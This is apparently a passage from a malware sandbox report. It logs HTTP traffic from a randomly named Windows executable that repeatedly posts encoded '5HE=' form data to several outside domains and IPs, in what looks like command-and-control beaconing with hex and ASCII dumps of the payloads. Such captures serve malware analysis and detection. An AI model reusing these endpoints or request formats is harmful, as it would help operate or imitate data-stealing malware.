                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Origin: http://www.funnelkakes.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.funnelkakes.com/sgjw/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               2 | 192.168.2.7 | 49707 | 76.223.67.189 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:33.155786037 CEST | 738 | OUT | POST /sgjw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Origin: http://www.funnelkakes.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.funnelkakes.com/sgjw/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               3 | 192.168.2.7 | 49708 | 76.223.67.189 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:36.025886059 CEST | 1751 | OUT | POST /sgjw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Origin: http://www.funnelkakes.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.funnelkakes.com/sgjw/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               4 | 192.168.2.7 | 49709 | 76.223.67.189 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:39.326219082 CEST | 449 | OUT | GET /sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.funnelkakes.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                               Jul 21, 2024 13:31:39.801973104 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:31:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8"}</script></head></html>


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               5 | 192.168.2.7 | 49710 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:44.848642111 CEST | 718 | OUT | POST /knjl/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Origin: http://www.shiybalinks.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.shiybalinks.com/knjl/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               6 | 192.168.2.7 | 49711 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 21, 2024 13:31:47.389334917 CEST | 738 | OUT | POST /knjl/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Origin: http://www.shiybalinks.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.shiybalinks.com/knjl/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.7 | 49712 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:31:50.187031031 CEST | 1751 | OUT | POST /knjl/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Origin: http://www.shiybalinks.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.shiybalinks.com/knjl/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4b 49 64 70 2f 4f 32 37 2b 69 67 6d 2b 4a 75 4b 63 68 4c 4e 55 4f 31 58 4e 66 4f 69 66 66 6c 36 6e 67 74 51 79 59 6a 6d 72 6f 4a 70 68 68 75 35 38 68 5a 48 56 4d 68 34 62 48 32 43 39 4a 69 49 42 72 54 67 4c 38 47 69 55 5a 46 73 34 50 2f 5a 35 64 6c 65 75 41 64 30 4f 73 45 76 47 54 73 31 4e 61 30 65 2f 56 51 6b 34 6f 65 54 4b 56 6b 54 39 72 55 68 6a 52 62 78 4d 48 74 64 75 31 44 59 36 33 53 6a 58 73 61 50 71 53 34 49 37 74 30 37 71 37 7a 66 73 55 71 34 56 5a 71 4d 30 78 35 4d 62 34 43 6a 55 6c 45 6e 57 72 78 53 78 76 4b 76 32 6b 64 39 41 78 30 45 42 51 38 71 42 51 41 66 38 52 65 7a 2f 41 51 36 7a 2f 34 39 62 66 30 35 53 33 38 48 65 32 4d 78 4b 4f 47 6c 5a 59 68 6a 54 62 34 67 61 6c 4d 45 67 75 37 47 71 31 41 31 34 54 34 52 37 59 46 42 59 52 4b 6f 50 4a 78 2b 50 6a 37 64 6d 50 64 51 70 73 49 54 48 30 37 6e 4a 4f 5a 62 43 47 65 52 5a 59 54 72 6c 76 30 6a 38 64 74 47 37 4f 6f 49 33 47 2f 67 4b 50 43 66 66 71 31 4f 6a 77 2f 34 76 6b 4f 78 4b 4d 54 51 6d 32 42 7a 57 48 75 5a 59 72 48 59 44 32 [TRUNCATED]
                                              Data Ascii: 5HE= [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.7 | 49713 | 3.33.130.190 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:31:52.717626095 CEST | 449 | OUT | GET /knjl/?5HE=HK1J84a27gkQ4beEKC61UbBVEOGAatJ0tiVbzvXViKVP6nm44mJHR8I5ZHuKj7DoAb3eP5+6cpVF46y42P5lmjxSIvkSYBgtFYg212IX7KyLN1Uz7dQ5iXPzMiB/yXbJ01avbd6tiSoS&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.shiybalinks.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:31:53.199148893 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:31:53 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 48 4b 31 4a 38 34 61 32 37 67 6b 51 34 62 65 45 4b 43 36 31 55 62 42 56 45 4f 47 41 61 74 4a 30 74 69 56 62 7a 76 58 56 69 4b 56 50 36 6e 6d 34 34 6d 4a 48 52 38 49 35 5a 48 75 4b 6a 37 44 6f 41 62 33 65 50 35 2b 36 63 70 56 46 34 36 79 34 32 50 35 6c 6d 6a 78 53 49 76 6b 53 59 42 67 74 46 59 67 32 31 32 49 58 37 4b 79 4c 4e 31 55 7a 37 64 51 35 69 58 50 7a 4d 69 42 2f 79 58 62 4a 30 31 61 76 62 64 36 74 69 53 6f 53 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=HK1J84a27gkQ4beEKC61UbBVEOGAatJ0tiVbzvXViKVP6nm44mJHR8I5ZHuKj7DoAb3eP5+6cpVF46y42P5lmjxSIvkSYBgtFYg212IX7KyLN1Uz7dQ5iXPzMiB/yXbJ01avbd6tiSoS&UXR=kTP8XfI8"}</script></head></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.7 | 49714 | 188.114.97.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:31:58.279372931 CEST | 718 | OUT | POST /xm40/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Origin: http://www.olhadeputat.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.olhadeputat.com/xm40/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 51 59 6f 42 32 34 72 67 73 6a 4d 4f 2b 76 30 4e 65 4e 39 4c 51 2f 31 49 4a 55 51 43 35 6c 38 63 74 6d 67 66 38 45 63 30 42 4b 77 6b 4c 67 57 56 32 2f 63 37 45 4e 57 6a 44 32 70 56 6a 47 4c 45 64 63 47 4a 73 76 71 4e 38 37 69 4e 6d 38 4c 6d 4e 4a 6c 39 55 63 67 63 51 2f 5a 4f 31 54 30 50 69 62 6e 74 69 38 4a 63 71 4d 53 41 2b 48 6e 2f 48 61 53 75 54 58 49 78 70 6c 43 61 50 41 32 35 62 61 46 68 52 5a 39 70 54 34 57 58 67 39 4d 4a 6b 52 7a 63 76 55 2b 77 5a 71 78 38 73 75 51 42 6e 37 37 6f 6b 4e 57 76 71 4b 51 36 48 64 51 44 66 66 54 2f 79 56 51 37 6d 34 50 6c 2b 38 48 37 6b 5a 7a 78 78 72 70 43 34 52 56 4a 36 39 59 62 45 77 3d 3d
                                              Data Ascii: 5HE=QYoB24rgsjMO+v0NeN9LQ/1IJUQC5l8ctmgf8Ec0BKwkLgWV2/c7ENWjD2pVjGLEdcGJsvqN87iNm8LmNJl9UcgcQ/ZO1T0Pibnti8JcqMSA+Hn/HaSuTXIxplCaPA25baFhRZ9pT4WXg9MJkRzcvU+wZqx8suQBn77okNWvqKQ6HdQDffT/yVQ7m4Pl+8H7kZzxxrpC4RVJ69YbEw==
                                              Jul 21, 2024 13:31:58.865998030 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:31:58 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faQBi4XxkwYkG%2Bcusb%2B9g8AzfTGjvJyRW%2FefFCYEweeP1wm0z0v3JJny8cSPOQsO8Tn4%2BMWJrRwgL2If3ILE5ZFaQlSy4CHBzvZNBDAUw5kbQOwQFgMpDzF%2F3IzIk0q05Sl7Fx5K"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade23bd2b0f87-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 32 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                              Data Ascii: 2afTo0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6
                                              Jul 21, 2024 13:31:58.866065025 CEST | 82 | IN | Data Raw: 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f 00 00 ff ff e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: +D3Q`N34oWH`4fT-e)]hR+UUc@Ef0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.7 | 49715 | 188.114.97.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:00.990570068 CEST | 738 | OUT | POST /xm40/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Origin: http://www.olhadeputat.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.olhadeputat.com/xm40/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 51 59 6f 42 32 34 72 67 73 6a 4d 4f 34 50 45 4e 59 75 56 4c 58 66 31 50 47 30 51 43 73 31 38 59 74 6d 73 66 38 47 77 6b 42 38 49 6b 4c 43 4f 56 31 2b 63 37 44 4e 57 6a 4d 57 70 4d 38 32 4b 49 64 63 37 30 73 76 57 4e 38 37 32 4e 6d 39 58 6d 4d 2b 35 2b 53 4d 67 61 59 66 5a 49 72 6a 30 50 69 62 6e 74 69 34 68 6c 71 4e 32 41 2b 58 33 2f 47 2b 6d 76 64 33 49 79 75 6c 43 61 64 77 32 39 62 61 45 4d 52 63 56 54 54 36 75 58 67 34 77 4a 6a 45 54 66 34 45 2b 32 55 4b 77 55 2f 73 34 4b 69 70 53 62 6c 62 57 55 71 71 55 71 43 72 4e 68 46 39 66 54 73 45 6f 41 69 36 72 54 70 61 61 4f 6d 59 33 70 38 4a 64 6a 6e 6d 77 6a 33 76 35 66 53 44 73 78 41 51 75 49 32 63 34 30 57 4d 64 2f 63 42 53 6a 41 78 59 3d
                                              Data Ascii: 5HE=QYoB24rgsjMO4PENYuVLXf1PG0QCs18Ytmsf8GwkB8IkLCOV1+c7DNWjMWpM82KIdc70svWN872Nm9XmM+5+SMgaYfZIrj0Pibnti4hlqN2A+X3/G+mvd3IyulCadw29baEMRcVTT6uXg4wJjETf4E+2UKwU/s4KipSblbWUqqUqCrNhF9fTsEoAi6rTpaaOmY3p8Jdjnmwj3v5fSDsxAQuI2c40WMd/cBSjAxY=
                                              Jul 21, 2024 13:32:01.508244991 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:01 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9DlxYB3gUIZr59Wek%2BG5QKdeJDlp6esF4zQdPZ3jb6EfSDAcTEWeTj6OZiMCuSKF5PO9GU2HxnPVWgNSAxEgRbLCxP8RVvR7BNc1KxZXXVwex%2B3O5qFGnCH6ZVJgEXkPzXHmyCo"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade345b560f6b-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                              Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6+D3
                                              Jul 21, 2024 13:32:01.508265972 CEST | 81 | IN | Data Raw: 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: Q`N34oWH`4fT-e)]hR+UUc@cEf0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.7 | 49716 | 188.114.97.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:03.893337011 CEST | 1751 | OUT | POST /xm40/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Origin: http://www.olhadeputat.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.olhadeputat.com/xm40/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 51 59 6f 42 32 34 72 67 73 6a 4d 4f 34 50 45 4e 59 75 56 4c 58 66 31 50 47 30 51 43 73 31 38 59 74 6d 73 66 38 47 77 6b 42 2f 6f 6b 49 78 47 56 33 64 45 37 43 4e 57 6a 46 32 70 4a 38 32 4c 53 64 59 75 2f 73 76 61 64 38 35 4f 4e 6d 66 7a 6d 4c 4c 4e 2b 63 4d 67 61 48 50 5a 4e 31 54 31 56 69 62 32 6b 69 38 4e 6c 71 4e 32 41 2b 53 37 2f 50 4b 53 76 66 33 49 78 70 6c 43 73 50 41 32 46 62 61 4d 79 52 63 5a 44 54 4a 6d 58 68 59 41 4a 69 33 37 66 37 6b 2b 30 54 4b 77 4d 2f 73 6c 53 69 70 50 67 6c 62 4c 78 71 74 67 71 43 75 77 34 66 38 54 72 2f 6c 38 66 68 4a 54 46 76 34 32 48 2f 35 4c 78 38 75 6c 66 6d 32 38 48 32 4a 4e 4b 61 58 39 38 57 43 6e 34 77 6f 77 74 59 62 45 57 49 54 69 5a 65 6c 39 59 4e 31 50 2f 69 58 73 71 70 78 4d 6f 44 6f 4b 31 55 47 55 4b 41 6f 6d 55 49 6d 35 65 6e 6b 4e 5a 64 59 75 72 53 6d 34 54 48 4c 67 4e 38 74 44 75 53 37 78 50 49 76 42 36 4e 46 4b 72 65 63 50 6b 4c 4b 54 7a 31 58 78 47 76 46 52 59 63 6f 6e 68 67 46 54 76 78 51 48 35 32 45 4a 70 69 53 69 36 69 4d 31 56 52 62 [TRUNCATED]
                                              Data Ascii: 5HE=QYoB24rgsjMO4PENYuVLXf1PG0QCs18Ytmsf8GwkB/okIxGV3dE7CNWjF2pJ82LSdYu/svad85ONmfzmLLN+cMgaHPZN1T1Vib2ki8NlqN2A+S7/PKSvf3IxplCsPA2FbaMyRcZDTJmXhYAJi37f7k+0TKwM/slSipPglbLxqtgqCuw4f8Tr/l8fhJTFv42H/5Lx8ulfm28H2JNKaX98WCn4wowtYbEWITiZel9YN1P/iXsqpxMoDoK1UGUKAomUIm5enkNZdYurSm4THLgN8tDuS7xPIvB6NFKrecPkLKTz1XxGvFRYconhgFTvxQH52EJpiSi6iM1VRbwKucf8O9niWSueMf9JCH/Ju3JMhP7bS30aVtz9MeufoJ/EcEgmST5Gut/WVLCMfm/ueV//FcjAwILr5vBzGP6s1JUKGWDkNhhH7C+soPyoMEKtV12taSEF7kmun/ZM7RfuGJM2KlkAJ6AlnIh6p7yhTdSQ+uaIQ3mNJc0rYzZ29sm/fU5/q0mhTlIDujy9ycCfOBGNztkk3/kXnHzHm1y2Vzrd8bGdidLnl7prB0mQS16XtWO8kmYdjaHF1nURunsyXVeOOboMEp5RXaAZaVOVeNRJb4nrsrS9E3+fAj9UHejGenOlDQLcUmHIOSuweuNqsIXptMlRsUE376r1OqWQV8uEwKhPG/nFOg6uGJOOTxuxkCJr5COyKXdMOZrflTWjldZgmyZTAEs5ootI/kapx3DkRcFELt897NLWeS3kzRHoDF+hJfvd/DvwO8grj7w0wkfN+ndxDccNDRjR7coZ3dBZ6+D247Y7hwIW/iPEKvcDJriPUaDuYPq8RQwcSiix0mxrrwOge+VHN62no3MOtj4AiuUNNiP0FEJM4c+W2hjTrTMcewxAe/TFlhTId0Vituct/ZPwnt0sPp6QjYNB4ue7MQh/6wIS5KzCuLDkfIlgEyKgj893oWWH7oSTxOVGyaAVooIS9qQmDpTmMwCphk94GpKzM/TM [TRUNCATED]
                                              Jul 21, 2024 13:32:04.501538038 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:04 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
